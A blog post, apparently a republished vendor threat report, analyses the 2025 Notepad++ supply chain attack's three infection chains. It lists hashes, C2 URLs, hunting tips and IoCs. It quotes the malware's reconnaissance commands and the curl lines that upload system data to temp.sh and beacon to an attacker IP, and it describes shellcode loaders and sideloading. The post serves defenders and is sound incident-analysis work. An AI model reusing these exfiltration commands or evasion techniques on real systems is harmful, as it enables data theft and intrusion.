{"id":1003,"date":"2026-02-03T09:04:28","date_gmt":"2026-02-03T09:04:28","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/"},"modified":"2026-02-03T09:04:28","modified_gmt":"2026-02-03T09:04:28","slug":"the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/02\/03\/the-notepad-supply-chain-attack-unnoticed-execution-chains-and-new-iocs\/","title":{"rendered":"The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs"},"content":{"rendered":"<div>\n<p><img width=\"990\" height=\"400\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072543\/notepad-supply-chain-attack-featured-image-990x400.jpg\" class=\"attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image\" alt=\"\" decoding=\"async\" loading=\"lazy\"><\/p>\n<h2 id=\"introduction\">Introduction<\/h2>\n<p>On February 2, 2026, the developers of Notepad++, a text editor popular among developers, <a href=\"https:\/\/notepad-plus-plus.org\/news\/hijacked-incident-info-update\/\" target=\"_blank\">published a statement<\/a> claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access to internal services until December 2025.<\/p>\n<h2 id=\"multiple-execution-chains-and-payloads\">Multiple execution chains and payloads<\/h2>\n<p>Having checked our telemetry related to this incident, we were amazed to find how different and unique the execution chains used in this supply chain attack were. 
We found that over the course of four months, from July to October 2025, the attackers who compromised Notepad++ constantly rotated the C2 server addresses used for distributing malicious updates, the downloaders used for implant delivery, and the final payloads.<\/p>\n<p>We observed three different infection chains overall, designed to attack about a dozen machines belonging to:<\/p>\n<ul>\n<li>Individuals located in Vietnam, El Salvador and Australia;<\/li>\n<li>A government organization located in the Philippines;<\/li>\n<li>A financial organization located in El Salvador;<\/li>\n<li>An IT service provider organization located in Vietnam.<\/li>\n<\/ul>\n<p>Despite the variety of payloads observed, Kaspersky solutions were able to block the identified attacks as they occurred.<\/p>\n<p>In this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack and provide numerous previously unpublished IoCs related to it.<\/p>\n<h3 id=\"chain-1-late-july-and-early-august-2025\">Chain #1 \u2014 late July and early August 2025<\/h3>\n<p>We first observed attackers deploying a malicious Notepad++ update in late July 2025. It was hosted at http:\/\/45.76.155[.]202\/update\/update.exe. Notably, the first scan of this URL on the VirusTotal platform occurred in late September, by a user from Taiwan.<\/p>\n<p>The <code>update.exe<\/code> file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the legitimate Notepad++ updater process, <code>GUP.exe<\/code>. This file turned out to be an NSIS installer of about 1 MB in size. When started, it sends a heartbeat containing system information to the attackers. 
This is done through the following steps:<\/p>\n<ol>\n<li>The file creates a directory named <code>%appdata%\\ProShow<\/code> and sets it as the current directory;<\/li>\n<li>It executes the shell command <code>cmd \/c whoami&amp;&amp;tasklist &gt; 1.txt<\/code>, thus creating a file with the shell command execution results in the <code>%appdata%\\ProShow<\/code> directory;<\/li>\n<li>Then it uploads the <code>1.txt<\/code> file to the temp[.]sh hosting service by executing the <code>curl.exe -F \"file=@1.txt\" -s https:\/\/temp.sh\/upload<\/code> command;<\/li>\n<li>Next, it sends the URL of the uploaded <code>1.txt<\/code> file by using the <code>curl.exe --user-agent \"https:\/\/temp.sh\/ZMRKV\/1.txt\" -s http:\/\/45.76.155[.]202<\/code> shell command. As can be observed, the uploaded file URL is transferred inside the user agent.<\/li>\n<\/ol>\n<p>Notably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the use of the temp[.]sh website for file uploading, has been described on the Notepad++ community forums by a user named soft-parsley.<br \/>\n<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1.png\" class=\"magnificImage\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1.png\" alt=\"\" width=\"2048\" height=\"783\" class=\"aligncenter size-full wp-image-118712\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1.png 2048w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-300x115.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-1024x392.png 1024w, 
https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-768x294.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-1536x587.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-915x350.png 915w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-740x283.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-732x280.png 732w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072857\/notepad-supply-chain-attack-1-800x306.png 800w\" sizes=\"(max-width: 2048px) 100vw, 2048px\"><\/a><br \/>\nAfter sending system information, the <code>update.exe<\/code> file executes the second-stage payload. To do that, it performs the following actions:<\/p>\n<ul>\n<li>Drops the following files to the <code>%appdata%\\ProShow<\/code> directory:\n<ul>\n<li><code>ProShow.exe<\/code> (SHA1: defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c)<\/li>\n<li><code>defscr<\/code> (SHA1: 259cd3542dea998c57f67ffdd4543ab836e3d2a3)<\/li>\n<li><code>if.dnt<\/code> (SHA1: 46654a7ad6bc809b623c51938954de48e27a5618)<\/li>\n<li><code>proshow.crs<\/code> (SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709)<\/li>\n<li><code>proshow.phd<\/code> (SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709)<\/li>\n<li><code>proshow_e.bmp<\/code> (SHA1: 9df6ecc47b192260826c247bf8d40384aa6e6fd6)<\/li>\n<li><code>load<\/code> (SHA1: 06a6a5a39193075734a32e0235bde0e979c27228)<\/li>\n<\/ul>\n<\/li>\n<li>Executes the dropped <code>ProShow.exe<\/code> file.<\/li>\n<\/ul>\n<p>The launched <code>ProShow.exe<\/code> file is legitimate ProShow software, which is abused to launch a malicious payload. 
Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort to the DLL sideloading technique. However, this time the attackers decided to avoid it \u2014 likely due to how much attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the ProShow software, which dates back to the early 2010s. The dropped file named <code>load<\/code> contains an exploit payload, which is triggered when the <code>ProShow.exe<\/code> file is launched. It is worth noting that, apart from this payload, all files in the <code>%appdata%\\ProShow<\/code> directory are legitimate.<\/p>\n<p>Analysis of the exploit payload revealed that it contains two shellcodes \u2014 one at the very start and the other one in the middle of the file. The shellcode located at the start of the file contains a set of meaningless instructions and is not designed to be executed \u2014 rather, attackers used it as the exploit padding bytes. It is likely that, by using a fake shellcode for padding bytes instead of something else (e.g., a sequence of <code>0x41<\/code> characters or random bytes), attackers aimed to confuse researchers and automated analysis systems.<\/p>\n<p>The second shellcode, which is stored in the middle of the file, is the one that is launched when <code>ProShow.exe<\/code> is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https:\/\/45.77.31[.]210\/users\/admin (user agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/138.0.0.0 Safari\/537.36) and launches it.<\/p>\n<p>The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. 
For instance, it uses the GET request URL https:\/\/45.77.31[.]210\/api\/update\/v1 and the POST request URL https:\/\/45.77.31[.]210\/api\/FileUpload\/submit.<\/p>\n<p>Later on, in early August 2025, we observed attackers using the same download URL for the <code>update.exe<\/code> files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for delivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:<\/p>\n<ul>\n<li>In the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to https:\/\/cdncheck.it[.]com\/users\/admin;<\/li>\n<li>The Cobalt Strike C2 server URLs were set to https:\/\/cdncheck.it[.]com\/api\/update\/v1 and https:\/\/cdncheck.it[.]com\/api\/Metadata\/submit.<\/li>\n<\/ul>\n<p>We have not seen any further infections leveraging chain #1 after early August 2025.<\/p>\n<h3 id=\"chain-2-middle-and-end-of-september-2025\">Chain #2 \u2014 middle and end of September 2025<\/h3>\n<p>A month and a half after malicious update detections ceased, we observed attackers resuming deployment of these updates in the middle of September 2025, using another infection chain. The malicious update was still being distributed from the http:\/\/45.76.155[.]202\/update\/update.exe URL, and the file downloaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now about 140 KB. 
Again, this file performed two actions:<\/p>\n<ul>\n<li>Obtained system information by executing a shell command and uploading its execution results to temp[.]sh;<\/li>\n<li>Dropped a next-stage payload on disk and launched it.<\/li>\n<\/ul>\n<p>Regarding system information, attackers made the following changes to how it was collected:<\/p>\n<ul>\n<li>They changed the working directory to <code>%APPDATA%\\Adobe\\Scripts<\/code>;<\/li>\n<li>They started collecting more system information details, changing the executed shell command to <code>cmd \/c \"whoami&amp;&amp;tasklist&amp;&amp;systeminfo&amp;&amp;netstat -ano\" &gt; a.txt<\/code>.<\/li>\n<\/ul>\n<p>The created <code>a.txt<\/code> file was, just as in the case of stage #1, uploaded to the temp[.]sh website through curl, with the obtained temp[.]sh URL being transferred to the same http:\/\/45.76.155[.]202\/list endpoint, inside the User-Agent header.<\/p>\n<p>As for the next-stage payload, it was changed completely. The NSIS installer was configured to drop the following files to the <code>%APPDATA%\\Adobe\\Scripts<\/code> directory:<\/p>\n<ul>\n<li><code>alien.dll<\/code> (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da);<\/li>\n<li><code>lua5.1.dll<\/code> (SHA1: 2ab0758dda4e71aee6f4c8e4c0265a796518f07d);<\/li>\n<li><code>script.exe<\/code> (SHA1: bf996a709835c0c16cce1015e6d44fc95e08a38a);<\/li>\n<li><code>alien.ini<\/code> (SHA1: ca4b6fe0c69472cd3d63b212eb805b7f65710d33).<\/li>\n<\/ul>\n<p>Next, it executes the following shell command to launch the <code>script.exe<\/code> file: <code>%APPDATA%\\Adobe\\Scripts\\script.exe %APPDATA%\\Adobe\\Scripts\\alien.ini<\/code>.<\/p>\n<p>All of the files in the <code>%APPDATA%\\Adobe\\Scripts<\/code> directory, except for <code>alien.ini<\/code>, are legitimate and related to the Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua script, located in the <code>alien.ini<\/code> file. 
Below is a screenshot of its decompilation:<br \/>\n<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2.png\" alt=\"\" width=\"560\" height=\"291\" class=\"aligncenter size-full wp-image-118713\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2.png 560w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2-300x156.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072904\/notepad-supply-chain-attack-2-539x280.png 539w\" sizes=\"auto, (max-width: 560px) 100vw, 560px\"><\/a><br \/>\nAs we can see, this small script is used for placing shellcode inside executable memory and then launching it through the <code>EnumWindowStationsW<\/code> API function.<\/p>\n<p>The launched shellcode is, just as in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike Beacon payload, again in the form of shellcode, from the https:\/\/cdncheck.it[.]com\/users\/admin URL.<\/p>\n<p>The Cobalt Strike payload contains C2 server URLs that differ slightly from the ones seen previously: https:\/\/cdncheck.it[.]com\/api\/getInfo\/v1 and https:\/\/cdncheck.it[.]com\/api\/FileUpload\/submit.<\/p>\n<p>Attacks involving chain #2 continued until the end of September, when we observed two more malicious <code>update.exe<\/code> files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon payload delivered through it was configured to use the same URLs observed in mid-September; however, attackers changed the way system information was collected. 
Specifically, attackers split the single shell command they used for this (<code>cmd \/c \"whoami&amp;&amp;tasklist&amp;&amp;systeminfo&amp;&amp;netstat -ano\" &gt; a.txt<\/code>) into multiple commands:<\/p>\n<ul>\n<li><code>cmd \/c whoami &gt;&gt; a.txt<\/code><\/li>\n<li><code>cmd \/c tasklist &gt;&gt; a.txt<\/code><\/li>\n<li><code>cmd \/c systeminfo &gt;&gt; a.txt<\/code><\/li>\n<li><code>cmd \/c netstat -ano &gt;&gt; a.txt<\/code><\/li>\n<\/ul>\n<p>Notably, the same sequence of commands has been previously documented by the soft-parsley user on the Notepad++ community forums.<\/p>\n<p>The other <code>update.exe<\/code> file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. Using it, attackers performed the following:<\/p>\n<ul>\n<li>Changed the system information upload URL to https:\/\/self-dns.it[.]com\/list;<\/li>\n<li>Changed the user agent used in HTTP requests to Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/140.0.0.0 Safari\/537.36;<\/li>\n<li>Changed the URL used by the Metasploit downloader to https:\/\/safe-dns.it[.]com\/help\/Get-Start;<\/li>\n<li>Changed the Cobalt Strike Beacon C2 server URLs to https:\/\/safe-dns.it[.]com\/resolve and https:\/\/safe-dns.it[.]com\/dns-query.<\/li>\n<\/ul>\n<h3 id=\"chain-3-october-2025\">Chain #3 \u2014 October 2025<\/h3>\n<p>In early October 2025, attackers changed the infection chain once again. They also changed the C2 server for distributing malicious updates, with the observed update URL being http:\/\/45.32.144[.]255\/update\/update.exe. The payload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still an NSIS installer; however, unlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. 
It simply dropped the following files to the <code>%appdata%\\Bluetooth<\/code> directory:<\/p>\n<ul>\n<li><code>BluetoothService.exe<\/code>, a legitimate executable (SHA1: 21a942273c14e4b9d3faa58e4de1fd4d5014a1ed);<\/li>\n<li><code>log.dll<\/code>, a malicious DLL (SHA1: f7910d943a013eede24ac89d6388c1b98f8b3717);<\/li>\n<li><code>BluetoothService<\/code>, an encrypted shellcode (SHA1: 7e0790226ea461bcc9ecd4be3c315ace41e1c122).<\/li>\n<\/ul>\n<p>This execution chain relies on the sideloading of the <code>log.dll<\/code> file, which is responsible for launching the encrypted <code>BluetoothService<\/code> shellcode inside the <code>BluetoothService.exe<\/code> process. Notably, such execution chains are commonly used by Chinese-speaking threat actors. This particular execution chain <a href=\"https:\/\/www.rapid7.com\/blog\/post\/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit\/\" target=\"_blank\">has already been described by Rapid7<\/a>, and the final payload observed in it is the custom Chrysalis backdoor.<\/p>\n<p>Unlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. However, in their article Rapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the <code>C:\\ProgramData\\USOShared<\/code> folder, while conducting incident response on one of the machines infected with the Notepad++ supply chain attack. 
Whilst Rapid7 does not detail how this file was dropped to the victim machine, we can highlight the following similarities between that Beacon payload and the Beacon payloads observed in chains #1 and #2:<\/p>\n<ol>\n<li>In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used (api.wiresguard[.]com\/users\/admin for the Rapid7 payload, cdncheck.it[.]com\/users\/admin and http:\/\/45.77.31[.]210\/users\/admin for chain #1 and chain #2 payloads);<\/li>\n<li>The Beacon configurations are encrypted with the XOR key <code>CRAZY<\/code>;<\/li>\n<li>Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e. api.wiresguard[.]com\/api\/FileUpload\/submit for the Rapid7 payload and https:\/\/45.77.31[.]210\/api\/FileUpload\/submit for the chain #1 payload).<\/li>\n<\/ol>\n<h3 id=\"return-of-chain-2-and-changes-in-urls-october-2025\">Return of chain #2 and changes in URLs \u2014 October 2025<\/h3>\n<p>In mid-October 2025, we observed attackers resuming deployments of the chain #2 payload (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: http:\/\/95.179.213[.]0\/update\/update.exe. Still, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system information uploading, Metasploit downloader and Cobalt Strike Beacon communications.<\/p>\n<p>Later, in late October 2025, we observed attackers starting to change the URLs used for malicious update deliveries. Specifically, attackers started using the following URLs:<\/p>\n<ul>\n<li>http:\/\/95.179.213[.]0\/update\/install.exe;<\/li>\n<li>http:\/\/95.179.213[.]0\/update\/update.exe;<\/li>\n<li>http:\/\/95.179.213[.]0\/update\/AutoUpdater.exe.<\/li>\n<\/ul>\n<p>We haven\u2019t observed any new payloads deployed from these URLs \u2014 they involved usage of both #2 and #3 execution chains. 
Finally, we have not seen any payloads being deployed starting from November 2025.<\/p>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>Notepad++ is a text editor used by numerous developers. As such, the ability to control update servers of this software gave attackers a unique possibility to break into machines of high-profile organizations around the world. The attackers made an effort to avoid losing access to this infection vector \u2014 they were spreading the malicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains about once a month. Whilst we identified three distinct infection chains during our investigation, we would not be surprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains that we identified:<br \/>\n<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled.png\" alt=\"\" width=\"2578\" height=\"659\" class=\"aligncenter size-full wp-image-118714\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled.png 2578w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-300x77.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1024x262.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-768x196.png 768w, 
https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1536x392.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-2048x523.png 2048w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1370x350.png 1370w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-740x189.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-1096x280.png 1096w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/02\/03072921\/notepad-supply-chain-attack-3-scaled-800x204.png 800w\" sizes=\"auto, (max-width: 2578px) 100vw, 2578px\"><\/a><br \/>\nThe variety of infection chains makes detection of the Notepad++ supply chain attack quite a difficult, and at the same time creative, task. We would like to propose the following methods, from generic to specific, to hunt down traces of this attack:<\/p>\n<ul>\n<li>Check systems for deployments of NSIS installers, which have been used in all three observed execution chains. For example, this can be done by looking for logs related to the creation of the <code>%localappdata%\\Temp\\ns.tmp<\/code> directory, made by NSIS installers at runtime. Make sure to investigate the origins of each identified NSIS installer to avoid false positives;<\/li>\n<li>Check network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual to observe in corporate environments. 
Also, it is beneficial to conduct a check for raw HTTP traffic requests that have a temp[.]sh URL embedded in the user agent \u2014 both these steps will make it possible to detect chain #1 and chain #2 deployments;<\/li>\n<li>Check systems for launches of malicious shell commands referenced in the article, such as <code>whoami<\/code>, <code>tasklist<\/code>, <code>systeminfo<\/code> and <code>netstat -ano<\/code>;<\/li>\n<li>Use specific IoCs listed below to identify known malicious domains and files.<\/li>\n<\/ul>\n<h2 id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<p>Malicious file paths<br \/>\n%appdata%\\ProShow\\load<br \/>\n%appdata%\\Adobe\\Scripts\\alien.ini<br \/>\n%appdata%\\Bluetooth\\BluetoothService<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Introduction On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[575,90,574,248,559,99,232,233,311,561,257],"tags":[91],"class_list":["post-1003","post","type-post","status-publish","format-standard","hentry","category-cobaltstrike","category-cybersecurity","category-dll-sideloading","category-great-research","category-incidents","category-malware","category-malware-descriptions","category-malware-technologies","category-shellcode","category-supply-chain-attack","category-windows-malware","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>The Notepad++ supply chain attack \u2014 unnoticed execution chains and new IoCs - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" 
content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<!-- \/ Yoast SEO plugin. -->"}